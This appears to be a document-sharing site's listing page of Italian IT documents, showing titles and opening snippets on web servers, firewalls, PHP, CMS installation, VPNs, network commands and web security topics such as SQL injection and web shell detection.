Elementi di Sicurezza e Privatezza Laboratorio 3 - Web Server Apache (1) Chiara Braghin chiara.braghin@unimi.it! Elementi di Sicurezza e Privatezza Laboratorio 3 - Web Server Apache (1) Chiara Braghin chiara.braghin@unimi.it! Sicurezza del Web server Sicurezza Web Server (1) Perché attaccare un Web server? w Per

Dettagli

Sicurezza del Web server

Sicurezza del Web server Elementi di Sicurezza e Privatezza Laboratorio 3 - Web Server Apache (1) Chiara Braghin chiara.braghin@unimi.it! Sicurezza del Web server 1 Sicurezza Web Server (1) Perché attaccare un Web server? w Per

Dettagli

Se state utilizzando la shell bash, ovvero la shell di riferimento per questo manuale, il terminale visualizzerà il seguente output:

Se state utilizzando la shell bash, ovvero la shell di riferimento per questo manuale, il terminale visualizzerà il seguente output: CAPITOLO 5 LA SHELL BASH Pietro Buffa Con questo capitolo comincia il nostro viaggio nel mondo delle Command Line Interface (CLI), ovvero le interfacce testuali a linea di comando tipiche dei sistemi UNIX

Dettagli

Come installare e configurare il software FileZilla

Come installare e configurare il software FileZilla Come utilizzare FileZilla per accedere ad un server FTP Con questo tutorial verrà mostrato come installare, configurare il software e accedere ad un server FTP, come ad esempio quello dedicato ai siti

Dettagli

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme.

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme. Visio Wifi Setup - Android Rev. 1.0.0 L app dedicate Android consente di trasformare il vostro device in un vero e proprio pannello di controllo remoto, e di gestire Visio Wifi in tutta libertà, in casa

Dettagli

Guida ai Servizi Internet per il Referente Aziendale

Guida ai Servizi Internet per il Referente Aziendale Guida ai Servizi Internet per il Referente Aziendale Indice Indice Introduzione...3 Guida al primo accesso...3 Accessi successivi...5 Amministrazione dei servizi avanzati (VAS)...6 Attivazione dei VAS...7

Dettagli

Console di Amministrazione Centralizzata Guida Rapida

Console di Amministrazione Centralizzata Guida Rapida Console di Amministrazione Centralizzata Contenuti 1. Panoramica... 2 Licensing... 2 Panoramica... 2 2. Configurazione... 3 3. Utilizzo... 4 Gestione dei computer... 4 Visualizzazione dei computer... 4

Dettagli

2.1 Installazione e configurazione LMS [4]

2.1 Installazione e configurazione LMS [4] 2.1 Installazione e configurazione LMS [4] Prerequisti per installazione su server: Versione PHP: 4.3.0 o superiori (compatibilità a php5 da versione 3.0.1) Versione MySql 3.23 o superiori Accesso FTP:

Dettagli

Manuale per il cliente finale

Manuale per il cliente finale Manuale per il cliente finale versione 1.6-r1 Indice 1 Cos è Confixx? - Generalità 4 1.1 Login................................ 4 1.2 Ritardi temporali delle impostazioni.............. 5 2 Settori della

Dettagli

MediaWiki. Giuseppe Frisoni

MediaWiki. Giuseppe Frisoni MediaWiki Giuseppe Frisoni MediaWiki: costruire insieme 1/2 L'enorme successo di Wikipedia, la nota enciclopedia online, è sotto gli occhi di tutti; cosa meno nota, invece, è la piattaforma con cui è progettata.

Dettagli

Individuare Web Shell nocive con PHP Shell

Individuare Web Shell nocive con PHP Shell http://www.readability.com/articles/7e9rlg94 html.it ORIGINAL PAGE Individuare Web Shell nocive con PHP Shell Detector by ANDREA DRAGHETTI Una shell Web è uno script, comunemente scritto in PHP, in grado

Dettagli

Database e reti. Piero Gallo Pasquale Sirsi

Database e reti. Piero Gallo Pasquale Sirsi Database e reti Piero Gallo Pasquale Sirsi Approcci per l interfacciamento Il nostro obiettivo è, ora, quello di individuare i possibili approcci per integrare una base di dati gestita da un in un ambiente

Dettagli

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software. Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere

Dettagli

Installazione & Configurazione Php e MySQL su Mac Os X. Php

Installazione & Configurazione Php e MySQL su Mac Os X. Php Installazione & Configurazione Php e MySQL su Mac Os X Php PHP è un linguaggio di scripting interpretato, con licenza Open Source, originariamente concepito per la realizzazione di pagine web dinamiche.

Dettagli

Introduzione all elaborazione di database nel Web

Introduzione all elaborazione di database nel Web Introduzione all elaborazione di database nel Web Prof.ssa M. Cesa 1 Concetti base del Web Il Web è formato da computer nella rete Internet connessi fra loro in una modalità particolare che consente un

Dettagli

APPENDICE B Le Active Server Page

APPENDICE B Le Active Server Page APPENDICE B Le Active Server Page B.1 Introduzione ad ASP La programmazione web è nata con la Common Gateway Interface. L interfaccia CGI tuttavia presenta dei limiti: ad esempio anche per semplici elaborazioni

Dettagli

Comandi di Rete. Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando

Comandi di Rete. Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando Comandi di Rete Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando PING: verifica la comunicazione tra due pc Il comando ping consente di verificare la connettività a livello

Dettagli

WEB TECHNOLOGY. Il web connette. LE persone. E-book n 2 - Copyright Reserved

WEB TECHNOLOGY. Il web connette. LE persone. E-book n 2 - Copyright Reserved WEB TECHNOLOGY Il web connette LE persone Indice «Il Web non si limita a collegare macchine, ma connette delle persone» Il Www, Client e Web Server pagina 3-4 - 5 CMS e template pagina 6-7-8 Tim Berners-Lee

Dettagli

Come fare a leggere questi dati generati da un programma windows?

Come fare a leggere questi dati generati da un programma windows? Come fare a leggere questi dati generati da un programma windows? A questo punto siamo in possesso di tutti gli elementi per sfruttare appieno le potenzialità di Linux: sappiamo destreggiarci (mai abbastanza)

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni

Dettagli

Guida all installazione di SWC701DataWebAccess (.net 2.0)

Guida all installazione di SWC701DataWebAccess (.net 2.0) Guida all installazione di SWC701DataWebAccess (.net 2.0) (per la versione 2.04 e successive di SWC701DataWebAccess) Premessa... 2 Introduzione... 2 Sistemi operativi supportati... 3 Installazione di SWC701DataWebAccess...

Dettagli

DNNCenter. Installazione standard di DotNetNuke 5. per Windows Vista. Installazione Standard DotNetNuke 5 per Windows Vista

DNNCenter. Installazione standard di DotNetNuke 5. per Windows Vista. Installazione Standard DotNetNuke 5 per Windows Vista DNNCenter Installazione standard di DotNetNuke 5 per Windows Vista Copyright OPSI Srl www.opsi.it Pag. 1 of 28 INDICE 1. INTRODUZIONE... 3 1.1. Pre-requisiti... 3 2. DOWNLOAD DOTNETNUKE... 4 2.1. Download

Dettagli

Presentazione. La guida è ben realizzata ed è ricca di immagini che aiutano la comprensione di diversi passaggi e delle configurazioni richieste.

Presentazione. La guida è ben realizzata ed è ricca di immagini che aiutano la comprensione di diversi passaggi e delle configurazioni richieste. Presentazione L amico e bravo Guido G. è l'autore di questa bella e semplice guida per la realizzazione di una rete VPN, che potrebbe essere utile a molte persone. Ringrazio Guido che ha voluto mettere

Dettagli

License Service Manuale Tecnico

License Service Manuale Tecnico Manuale Tecnico Sommario 1. BIM Services Console...3 1.1. BIM Services Console: Menu e pulsanti di configurazione...3 1.2. Menù Azioni...4 1.3. Configurazione...4 1.4. Toolbar pulsanti...5 2. Installazione

Dettagli

Questo punto richiederebbe uno sviluppo molto articolato che però a mio avviso va al di là delle possibilità fornite al candidato dal tempo a disposizione. Mi limiterò quindi ad indicare dei criteri di

Dettagli

Concetti base. Impianti Informatici. Web application

Concetti base. Impianti Informatici. Web application Concetti base Web application La diffusione del World Wide Web 2 Supporto ai ricercatori Organizzazione documentazione Condivisione informazioni Scambio di informazioni di qualsiasi natura Chat Forum Intranet

Dettagli

Modulo 8. Strumenti di produzione Strumenti. Gli strumenti più utilizzati per produrre pagine Web sono essenzialmente due:

Modulo 8. Strumenti di produzione Strumenti. Gli strumenti più utilizzati per produrre pagine Web sono essenzialmente due: Pagina 1 di 6 Strumenti di produzione Strumenti Gli strumenti più utilizzati per produrre pagine Web sono essenzialmente due: 1. Netscape Composer, gratuito e scaricabile da netscape.org assieme al browser

Dettagli

Il firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall

Il firewall ipfw. Introduzione ai firewall. Problema: sicurezza di una rete. Definizione di firewall. Introduzione ai firewall Il firewall ipfw Introduzione ai firewall classificazione Firewall a filtraggio dei pacchetti informazioni associate alle regole interpretazione delle regole ipfw configurazione impostazione delle regole

Dettagli

Corso di PHP. Prerequisiti. 1 - Introduzione

Corso di PHP. Prerequisiti. 1 - Introduzione Corso di PHP 1 - Introduzione 1 Prerequisiti Conoscenza HTML Principi di programmazione web Saper progettare un algoritmo Saper usare un sistema operativo Compilazione, link, esecuzione di programmi Conoscere

Dettagli

Applicazioni web centrati sui dati (Data-centric web applications)

Applicazioni web centrati sui dati (Data-centric web applications) Applicazioni web centrati sui dati (Data-centric web applications) 1 ALBERTO BELUSSI ANNO ACCADEMICO 2009/2010 WEB La tecnologia del World Wide Web (WWW) costituisce attualmente lo strumento di riferimento

Dettagli

Apache Monitoring con MRTG

Apache Monitoring con MRTG Apache Monitoring con MRTG Mi è capitato di dover monitorare il carico di lavoro di Apache, per rendermi conto dell effettivo sfruttamento delle risorse di sistema. Avevo in alcuni casi un decremento delle

Dettagli

Cimini Simonelli - Testa

Cimini Simonelli - Testa WWW.ICTIME.ORG Joomla 1.5 Manuale d uso Cimini Simonelli - Testa Cecilia Cimini Angelo Simonelli Francesco Testa Joomla 1.5 Manuale d uso V.1-31 Gennaio 2008 ICTime.org non si assume nessuna responsabilità

Dettagli

Manuale per la configurazione di AziendaSoft in rete

Manuale per la configurazione di AziendaSoft in rete Manuale per la configurazione di AziendaSoft in rete Data del manuale: 7/5/2013 Aggiornamento del manuale: 2.0 del 10/2/2014 Immagini tratte da Windows 7 Versione di AziendaSoft 7 Sommario 1. Premessa...

Dettagli

Manuale d uso e manutenzione (client Web e Web services)

Manuale d uso e manutenzione (client Web e Web services) Manuale d uso e manutenzione (client Web e Web services) Rev. 01-15 ITA Versione Telenet 2015.09.01 Versione DB 2015.09.01 ELECTRICAL BOARDS FOR REFRIGERATING INSTALLATIONS 1 3232 3 INSTALLAZIONE HARDWARE

Dettagli

Il web server Apache Lezione n. 3. Introduzione

Il web server Apache Lezione n. 3. Introduzione Procurarsi ed installare il web server Apache Introduzione In questa lezione cominciamo a fare un po di pratica facendo una serie di operazioni preliminari, necessarie per iniziare a lavorare. In particolar

Dettagli

LEZIONE 3. Il pannello di amministrazione di Drupal, configurazione del sito

LEZIONE 3. Il pannello di amministrazione di Drupal, configurazione del sito LEZIONE 3 Il pannello di amministrazione di Drupal, configurazione del sito Figura 12 pannello di controllo di Drupal il back-end Come già descritto nella lezione precedente il pannello di amministrazione

Dettagli

V 1.00b. by ReBunk. per suggerimenti e critiche mi trovate nell hub locarno.no-ip.org. Guida di base IDC ++1.072

V 1.00b. by ReBunk. per suggerimenti e critiche mi trovate nell hub locarno.no-ip.org. Guida di base IDC ++1.072 V 1.00b by ReBunk per suggerimenti e critiche mi trovate nell hub locarno.no-ip.org Guida di base IDC ++1.072 Thanks To SicKb0y (autore del idc++) staff (per sopportarmi tutti i giorni) Versione definitiva

Dettagli

Infrastrutture Software

Infrastrutture Software Infrastrutture Software I componenti fisici di un sistema informatico sono resi accessibili agli utenti attraverso un complesso di strumenti software finalizzati all utilizzo dell architettura. Si tratta

Dettagli

Introduzione. Livello applicativo Principi delle applicazioni di rete. Stack protocollare Gerarchia di protocolli Servizi e primitive di servizio 2-1

Introduzione. Livello applicativo Principi delle applicazioni di rete. Stack protocollare Gerarchia di protocolli Servizi e primitive di servizio 2-1 Introduzione Stack protocollare Gerarchia di protocolli Servizi e primitive di servizio Livello applicativo Principi delle applicazioni di rete 2-1 Pila di protocolli Internet Software applicazione: di

Dettagli

Simulazione seconda prova Esame di Stato Sito Web - Gestione di un centro agroalimentare all ingrosso (Parte seconda)

Simulazione seconda prova Esame di Stato Sito Web - Gestione di un centro agroalimentare all ingrosso (Parte seconda) Simulazione seconda prova Esame di Stato Sito Web - Gestione di un centro agroalimentare all ingrosso (Parte seconda) Il candidato realizzi inoltre il sito Internet del centro che deve permettere, tra

Dettagli

Innanzitutto andiamo sul sito http://www.dropbox.com/ ed eseguiamo il download del programma cliccando su Download Dropbox.

Innanzitutto andiamo sul sito http://www.dropbox.com/ ed eseguiamo il download del programma cliccando su Download Dropbox. Oggi parlerò di qualcosa che ha a che fare relativamente con la tecnica fotografica, ma che ci può dare una mano nella gestione dei nostri archivi digitali, soprattutto nel rapporto professionale con altre

Dettagli

Il File System. È la componente del S.O. che si occupa della gestione della memoria di massa e dell organizzazione logica dei dati

Il File System. È la componente del S.O. che si occupa della gestione della memoria di massa e dell organizzazione logica dei dati Il File System È la componente del S.O. che si occupa della gestione della memoria di massa e dell organizzazione logica dei dati Le operazioni supportate da un file system sono: eliminazione di dati modifica

Dettagli

UBUNTU: gli strumenti di condivisione risorse

UBUNTU: gli strumenti di condivisione risorse UBUNTU: gli strumenti di condivisione risorse condivisione 1o1 a cura di Danio Campolunghi La condivisione di risorse Verranno qui proposti gli strumenti grafici di serie messi a disposizione da Ubuntu

Dettagli

Vediamo come analizzare i pacchetti in transito su una rete con uno dei più celebri sniffer di matrice italiana: Ettercap.

Vediamo come analizzare i pacchetti in transito su una rete con uno dei più celebri sniffer di matrice italiana: Ettercap. Vediamo come analizzare i pacchetti in transito su una rete con uno dei più celebri sniffer di matrice italiana: Ettercap. La scelta è ricaduta su Ettercap in quanto, questo ottimo software, permette una

Dettagli

Corso basi di dati Introduzione alle ASP

Corso basi di dati Introduzione alle ASP Corso basi di dati Introduzione alle ASP Gianluca Di Tomassi Email: ditomass@dia.uniroma3.it Università di Roma Tre Web statico e Web interattivo In principio il Web era una semplice collezione di pagine

Dettagli

Servizi Remoti. Servizi Remoti. TeamPortal Servizi Remoti

Servizi Remoti. Servizi Remoti. TeamPortal Servizi Remoti 20120300 INDICE 1. Introduzione... 3 2. Consultazione... 4 2.1 Consultazione Server Fidati... 4 2.2 Consultazione Servizi Client... 5 2.3 Consultazione Stato richieste... 5 3. Amministrazione... 6 3.1

Dettagli

DSL-G604T Wireless ADSL Router

DSL-G604T Wireless ADSL Router Il presente prodotto può essere configurato con un browser web aggiornato come Internet Explorer 6 o Netscape Navigator 6.2.3. DSL-G604T Wireless ADSL Router Prima di cominciare 1. Se si intende utilizzare

Dettagli

Siti web centrati sui dati (Data-centric web applications)

Siti web centrati sui dati (Data-centric web applications) Siti web centrati sui dati (Data-centric web applications) 1 A L B E R T O B E L U S S I A N N O A C C A D E M I C O 2 0 1 2 / 2 0 1 3 WEB La tecnologia del World Wide Web (WWW) costituisce attualmente

Dettagli

Il server web: Apache, IIS e PWS

Il server web: Apache, IIS e PWS IL SERVER WEB Corso WebGIS - Master in Sistemi Informativi Territoriali AA 2005/2006 ISTI- CNR c.renso@isti.cnr.it Il server web: Apache, IIS e PWS...1 Directory di default...2 Alias e cartelle virtuali...3

Dettagli

ISTRUZIONI PASSO PASSO PER CREARE UN SITO CON JOOMLA SU ALTERVISTA

ISTRUZIONI PASSO PASSO PER CREARE UN SITO CON JOOMLA SU ALTERVISTA ISTRUZIONI PASSO PASSO PER CREARE UN SITO CON JOOMLA SU ALTERVISTA REGISTRARSI AL SITO ALTERVISTA, PER OTTENERE SPAZIO WEB GRATUITO o Andare sul sito it.altervista.org o Nel riquadro al centro, scrivere

Dettagli

Università degli Studi di Brescia

Università degli Studi di Brescia Contenuti professionalizzanti creazione e la gestione di siti web Web Programming Introduzione al corso Università degli Studi di Brescia Riccardo Cassinis Marzia Tassi Fabio Tampalini Il sito del corso

Dettagli

12.5 UDP (User Datagram Protocol)

12.5 UDP (User Datagram Protocol) CAPITOLO 12. SUITE DI PROTOCOLLI TCP/IP 88 12.5 UDP (User Datagram Protocol) L UDP (User Datagram Protocol) é uno dei due protocolli del livello di trasporto. Come l IP, é un protocollo inaffidabile, che

Dettagli

Come si può notare ogni richiesta ICMP Echo Request va in timeout in

Come si può notare ogni richiesta ICMP Echo Request va in timeout in Comandi di rete Utility per la verifica del corretto funzionamento della rete: ICMP Nelle procedure viste nei paragrafi precedenti si fa riferimento ad alcuni comandi, come ping e telnet, per potere verificare

Dettagli

14 maggio 2010 Versione 1.0

14 maggio 2010 Versione 1.0 SOFTWARE PER LA GESTIONE DI UN SISTEMA PER LA RILEVAZIONE DELLA QUALITÀ PERCEPITA DAGLI UTENTI, NEI CONFRONTI DI SERVIZI RICHIESTI ALLA PUBBLICA AMMINISTRAZIONE, ATTRAVERSO L'UTILIZZO DI EMOTICON. 14 maggio

Dettagli

Morret Mobile Robot Remote Tunneling

Morret Mobile Robot Remote Tunneling UNIVERSITÀ DI BRESCIA FACOLTÀ DI INGEGNERIA Dipartimento di Elettronica per l Automazione Laboratorio di Robotica Avanzata Advanced Robotics Laboratory Corso di Robotica (Prof. Riccardo Cassinis) Morret

Dettagli

CAPITOLO 1 I SISTEMI OPERATIVI

CAPITOLO 1 I SISTEMI OPERATIVI CAPITOLO 1 I SISTEMI OPERATIVI Introduzione ai sistemi operativi pag. 3 La shell pag. 3 Tipi di sistemi operativi pag. 4 I servizi del sistema operativo pag. 4 La gestione dei file e il file system Il

Dettagli

Infine abbiamo anche effettuato un operazione di traduzione in italiano delle due aree principali di Joomla.

Infine abbiamo anche effettuato un operazione di traduzione in italiano delle due aree principali di Joomla. Joomla dopo l installazione Lezione 2 Joomla dopo l installazione Premessa Abbiamo nella lezione precedente installato offline la piattaforma di Joomla. Ricapitolando abbiamo prima configurato EasyPhp

Dettagli

Software. Definizione, tipologie, progettazione

Software. Definizione, tipologie, progettazione Software Definizione, tipologie, progettazione Definizione di software Dopo l hardware analizziamo l altra componente fondamentale di un sistema di elaborazione. La macchina come insieme di componenti

Dettagli

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a:

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a: Lab 4.1 Utilizzare FTP (File Tranfer Protocol) LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) In questa lezione imparerete a: Utilizzare altri servizi Internet, Collegarsi al servizio Telnet, Accedere

Dettagli

Installare Drupal7 su Altervista e non solo

Installare Drupal7 su Altervista e non solo Installare Drupal7 su Altervista e non solo This opera is published under a Creative Commons License. www.glider.altervista.org lukadg@gmail.com Guida per installare Drupal7 su Altervista. Questa guida

Dettagli

PER FARE UN SITO INTERNET

PER FARE UN SITO INTERNET Diocesi Brescia Corso per animatori della Cultura e della Comunicazione PER FARE UN SITO INTERNET I diversi modelli di siti Internet. Dove e come pubblicarlo. INTERNET Rete di computer mondiale ad accesso

Dettagli

NOTE TECNICHE DI CONFIGURAZIONE. Giugno 2009

NOTE TECNICHE DI CONFIGURAZIONE. Giugno 2009 NOTE TECNICHE DI CONFIGURAZIONE Giugno 2009 INDICE Configurazioni 3 Configurazioni Windows Firewall.. 3 Configurazioni Permessi DCOM. 4 Installazione Sql Server 2005 9 Prerequisiti Software 7 Installazione

Dettagli

Programmazione in Rete

Programmazione in Rete Programmazione in Rete a.a. 2005/2006 http://www.di.uniba.it/~lisi/courses/prog-rete/prog-rete0506.htm dott.ssa Francesca A. Lisi lisi@di.uniba.it Orario di ricevimento: mercoledì ore 10-12 Sommario della

Dettagli

Seminari Eucip, Esercizio e Supporto di Sistemi Informativi

Seminari Eucip, Esercizio e Supporto di Sistemi Informativi Seminari Eucip, Esercizio e Supporto di Sistemi Informativi Servizi di Dipartimento di Informtica e Sistemistica Università di Roma La Sapienza Sicurezza su Sicurezza della La Globale La rete è inerentemente

Dettagli

Mausoleo COMUNE DI NUORO PROGETTO PER LA REALIZZAZIONE DEL CIMITERO MULTIMEDIALE. Arch.Marco Cerina Ing.Enrico Dini

Mausoleo COMUNE DI NUORO PROGETTO PER LA REALIZZAZIONE DEL CIMITERO MULTIMEDIALE. Arch.Marco Cerina Ing.Enrico Dini COMUNE DI NUORO D O C U M E N T O D I S P E C I F I C A P E R I L P R O D O T T O Mausoleo PROGETTO PER LA REALIZZAZIONE DEL CIMITERO MULTIMEDIALE Arch.Marco Cerina Ing.Enrico Dini Descrizione introduttiva

Dettagli

Flavio De Paoli depaoli@disco.unimib.it

Flavio De Paoli depaoli@disco.unimib.it Flavio De Paoli depaoli@disco.unimib.it 1 Il web come architettura di riferimento Architettura di una applicazione web Tecnologie lato server: Script (PHP, Pyton, Perl), Servlet/JSP, ASP Tecnologie lato

Dettagli

MANUALE D USO Agosto 2013

MANUALE D USO Agosto 2013 MANUALE D USO Agosto 2013 Descrizione generale MATCHSHARE è un software per la condivisione dei video e dati (statistiche, roster, ) delle gare sportive. Ogni utente abilitato potrà caricare o scaricare

Dettagli

il programma per la gestione dei reclami

il programma per la gestione dei reclami il programma per la gestione dei reclami BREVE DESCRIZIONE DELLE PRINCIPALI CARATTERISTICHE [gennaio 2006] PREMESSA: i dati che si possono leggere nelle seguenti immagini, sono tratti da basi di dati reali

Dettagli

Dynamic DNS e Accesso Remoto

Dynamic DNS e Accesso Remoto Dynamic DNS e Accesso Remoto 1 Descrizione Il Dynamic DNS è una tecnologia che consente di associare un nome host DNS ad un indirizzo IP assegnato allo stesso host, anche se questo cambia nel tempo. In

Dettagli

MDaemon e Outlook Connector for MDaemon

MDaemon e Outlook Connector for MDaemon MDaemon e Outlook Connector for MDaemon Introduzione...2 Cos'è il groupware...2 Che cosa significa groupware?...2 Cos è WorldClient...2 MDaemon e l evoluzione delle funzionalità groupware...3 Nuove funzionalità

Dettagli

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Corso Web programming

Corso Web programming Corso Web programming Modulo T3 A1 Modelli di programmazione 1 Prerequisiti Concetto di rete Processi e thread Concetti generali sui database 2 1 Introduzione Un particolare ambito della programmazione

Dettagli

Installation Guide. Pagina 1

Installation Guide. Pagina 1 Installation Guide Pagina 1 Introduzione Questo manuale illustra la procedura di Set up e prima installazione dell ambiente Tempest e del configuratore IVR. Questo manuale si riferisce alla sola procedura

Dettagli